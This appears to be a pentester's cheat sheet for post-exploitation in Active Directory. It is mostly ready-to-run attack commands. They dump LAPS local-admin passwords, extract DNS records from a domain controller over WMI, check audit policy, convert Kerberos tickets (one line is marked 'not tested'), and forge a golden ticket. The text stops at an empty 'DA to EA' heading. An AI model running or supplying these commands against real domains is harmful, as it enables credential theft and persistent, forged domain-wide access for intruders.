Post-Exploitation AD

Dump LAPS password

Get-DomainComputer <COMPUTERNAME|wks*> -Properties samaccountname,ms-mcs-admpwd

Dump DNS records

Wmi version compatible with old DC (can be adapted with wmic.exe if powershell not installed)

On the DC run

Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT TextRepresentation FROM MicrosoftDNS_AType WHERE ContainerName='<fqdn_domain>'" | fl > raw_records.txt
powershell Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName <DC> -Filter "DomainName = '<fqdn_domain>' AND TimeStamp=0" | fl > raw_records.txt

Records will be UTF-16 encoded so run

dos2unix raw_records.txt

Optional formating

cat raw_records.txt | grep TextRepresentation | cut -d " " -f 3,6 > a_records.txt 

DC event auditing

auditpol /get /category:*


Ticket converter

Convert ccache tickets into kirbi (KRB-CRED) and vice versa

Raw2B64 - Not tested

cat <ticket.raw> | sed s'| ||'g | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' | base64 -D >> <ticket.b64>
Golden Ticket

Standard Golden

golden_ticket_create -d <domain> -g <relative identifier> -k <hash> -s <SID> -u <user> -t /tmp/golden.tck

DA to EA